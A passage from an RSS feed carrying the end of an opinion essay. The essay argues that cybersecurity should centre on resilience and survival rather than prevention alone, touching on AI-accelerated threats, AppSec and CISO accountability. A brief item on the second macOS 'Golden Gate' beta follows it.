<p>This is why voluntary pledges are useful but insufficient. They create norms and language. They help responsible companies signal intent. But a pledge is not a control. A pledge without evidence, enforcement, procurement consequences, customer pressure, or liability is policy theater with potential. Better than silence, yes. Better than mandatory resilience? Not even close.</p>



<p>And then AI permeates the world as an accelerant poured across the entire problem.</p>



<h2 class="wp-block-heading">The AI uprising</h2>



<p>AI compresses time. It <a href="https://www.csoonline.com/article/4014238/cybercriminals-take-malicious-ai-to-the-next-level.html">lowers attacker skill barriers</a>. It improves phishing, reconnaissance, exploit development, malware support, impersonation, fraud, and social engineering. It also expands the attack surface inside companies through <a href="https://www.csoonline.com/article/4143302/the-cisos-guide-to-responding-to-shadow-ai.html">shadow AI</a>, <a href="https://www.csoonline.com/article/4047974/agentic-ai-a-cisos-security-nightmare-in-the-making.html">AI agents</a>, sensitive data leakage, automated decisions, insecure integrations, and systems that can act <a href="https://www.csoonline.com/article/4109999/agentic-ai-already-hinting-at-cybersecuritys-pending-identity-crisis.html">without anyone fully understanding how far their permissions reach</a>.</p>



<p>The uncomfortable part is that defenders need AI, too. Nobody is going to manually out-click, out-triage, and out-correlate machine-speed attacks with heroic analysts and vibes. Defensive AI is necessary. AI-assisted testing is necessary. <a href="https://www.csoonline.com/article/4145127/runtime-the-new-frontier-of-ai-agent-security.html">Runtime analysis is becoming more important</a>. <a href="https://www.csoonline.com/article/4064158/agentic-ai-in-it-security-where-expectations-meet-reality.html">Agentic security workflows will grow</a>. Humans matter, of course, but they will need to move from being button-pushers to decision-makers, validators, and designers of boundaries.</p>



<p>Recent Mythos revelation, whatever one thinks of it, <a href="https://www.csoonline.com/article/4158117/anthropics-mythos-signals-a-structural-cybersecurity-shift.html">exposed the broader truth</a>: AI is not merely another asset to secure. It changes the tempo of security. It changes what “timely” means. If attackers can move from discovery to exploitation faster than a company can schedule a change committee meeting, prevention-first chest-thumping becomes blind, brainless bravado.</p>



<p>Consequently, that is also where application security becomes central, but not in the narrow old sense.</p>



<h2 class="wp-block-heading">AppSec shows the way</h2>



<p>AppSec has traditionally been treated as prevention: find bugs, fix bugs, block exploit paths, test before release, scan the API, harden the app, stop the vulnerability from becoming an incident. That is still true. But modern AppSec is also resilience. Secure-by-design systems fail less catastrophically. Well-tested applications reduce blast radius. Strong API authorization protects business logic when identity is abused. Good software supply-chain controls make recovery possible because you know what you shipped, where it came from, and whether you can trust it. Continuous testing shortens the time between exposure and correction. Runtime visibility tells you what is actually happening, not what the architecture diagram claimed would happen in calmer weather.</p>



<p>The mature AppSec question is no longer only whether a vulnerability exists. It is how quickly the organization can discover exposure, validate exploitability, prioritize business impact, reduce blast radius, and prove the fix actually reduced risk.</p>



<p>So AppSec is preventive in method, but resilient in strategic value.</p>



<p>That matters because the old budget logic still lingers. Many organizations talk about resilience at the board level while still spending and operating like the real work is another tool, another dashboard, another rule, another exception queue, another heroic security team tuning SIEM alerts at midnight. There is a widening gap between the talk and the walk. The talk says resilience. The walk still mainly says prevention, compliance, and hope.</p>



<h2 class="wp-block-heading">Resilience becomes duty</h2>



<p>This is not to mock prevention. Prevention is valuable. It reduces noise and buys time. It blocks commodity attacks. Prevention keeps the easy doors closed and the lazy criminals moving. Good. Keep it. Fund it. Improve it.</p>



<p>But stop pretending it is the whole castle.</p>



<p>At some point, reinforcing the gate drains us of good iron. Or cash, as may be the case. The cannon is already here. Sometimes the cannon is ransomware. Sometimes it is a supplier compromise. Sometimes it is an AI-assisted vulnerability chain. Sometimes it is a cloud identity failure. Sometimes it is a security vendor update that helpfully demonstrates the concept of systemic risk by taking half the planet down before breakfast.</p>



<p>The organizations that survive will not be the ones with the prettiest walls. They will be the ones that know what happens when the walls fail.</p>



<p>They will know which services matter most. They will know their dependencies, how to isolate blast radius, how to restore from clean sources. They will know who decides, who communicates, who pays, who informs regulators, who speaks to customers, and who has authority to shut something down before the whole environment becomes a crime scene with invoices.</p>



<p>They will practice. Not once a year in a tabletop exercise where <a href="https://www.csoonline.com/article/4179644/7-tabletop-exercise-mistakes-that-sabotage-incident-response.html">everyone nods politely</a> and pretends Legal will respond in real-time. They will practice seriously. They will break assumptions. They will test recovery. They will challenge vendors. They will treat incident response as an organizational muscle, not a binder.</p>



<p>This is also where <a href="https://www.csoonline.com/article/3602722/the-ciso-paradox-with-great-responsibility-comes-little-or-no-power.html">CISO accountability must be discussed honestly</a>. It is easy to demand accountability from the security leader after the fire. It is harder to ask whether the CISO had budget, authority, board access, engineering influence, product leverage, procurement power, and documented risk acceptance before the fire. If a company wants the CISO to be accountable for survival, then the <a href="https://www.csoonline.com/article/3617367/dear-ceo-an-open-letter-from-your-ciso.html">CISO must be empowered to design for survival</a>. Otherwise, accountability is just corporate theater, and the CISO is one person selected in advance to <a href="https://www.csoonline.com/article/3631759/personal-liability-sours-70-of-cisos-on-their-role.html">stand under the falling chandelier</a>.</p>



<p>The same applies to boards. A board that funds only prevention but expects resilience after failure is not governing cyber risk. It is buying a bucketload of denial. Cybersecurity cannot remain a narrow technical department expected to compensate for fragile business architecture, reckless supplier dependence, poor software practices, underfunded recovery, unclear executive authority, and magical thinking about AI.</p>



<p>If cybersecurity is survival, then everyone who shapes organizational resilience shapes cybersecurity. Engineering shapes it. Procurement shapes it. Legal shapes it. Finance, Product, HR, Communications — they all shape it. The board, too, and the CEO. Security may lead the discipline, but it cannot be the only organ responsible for keeping the body alive.</p>



<p>That is the point. Not that prevention no longer matters. Not that we should abandon controls and have minstrels sing of resilience while attackers empty the database. The point is that protection is no longer enough to <em>define security</em>. A company that collapses when prevention fails was never truly secure. It was only protected until the first failure.</p>



<p>The cybersecurity paradigm of today and tomorrow must be built around survival: surviving breach, surviving disruption, surviving AI acceleration, surviving dependency failure, surviving regulatory scrutiny, and surviving the moment when the neat diagram meets the ugly incident.</p>



<p>We still need walls, gates, and guards.</p>



<p>But the wall is not the city, nor its citizens. And if the city and the citizens cannot survive after the wall falls, then maybe the wall was never a viable strategy.</p>



<p>Maybe it was just a waste of that good iron.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[macOS Golden Gate Beta 2 – Everything You Need to Know!]]></title>
<description><![CDATA[macOS Golden Gate Beta 27.0 Beta 2 is now Available! UPDATED: 06/22/26 Apple has released the second developer beta of macOS Golden Gate with more refinements to the new interface and AI features. Beta 2 further improves the Liquid Glass design with better readability, updated window styling, and...]]></description>
<link>https://tsecurity.de/de/3616419/ios-mac-os/macos-golden-gate-beta-2-everything-you-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616419/ios-mac-os/macos-golden-gate-beta-2-everything-you-need-to-know/</guid>
<pubDate>Mon, 22 Jun 2026 20:54:35 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>macOS Golden Gate Beta 27.0 Beta 2 is now Available! UPDATED: 06/22/26 Apple has released the second developer beta of macOS Golden Gate with more refinements to the new interface and AI features. Beta 2 further improves the Liquid Glass design with better readability, updated window styling, and a new transparency slider that lets you … <a href="https://mrmacintosh.com/macos-golden-gate-beta-2-everything-you-need-to-know/" class="more-link">Continue reading<span class="screen-reader-text"> "macOS Golden Gate Beta 2 – Everything You Need to Know!"</span></a></p>
<p>The post <a href="https://mrmacintosh.com/macos-golden-gate-beta-2-everything-you-need-to-know/">macOS Golden Gate Beta 2 – Everything You Need to Know!</a> appeared first on <a href="https://mrmacintosh.com/">Mr. Macintosh</a>.</p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 2,21ms -->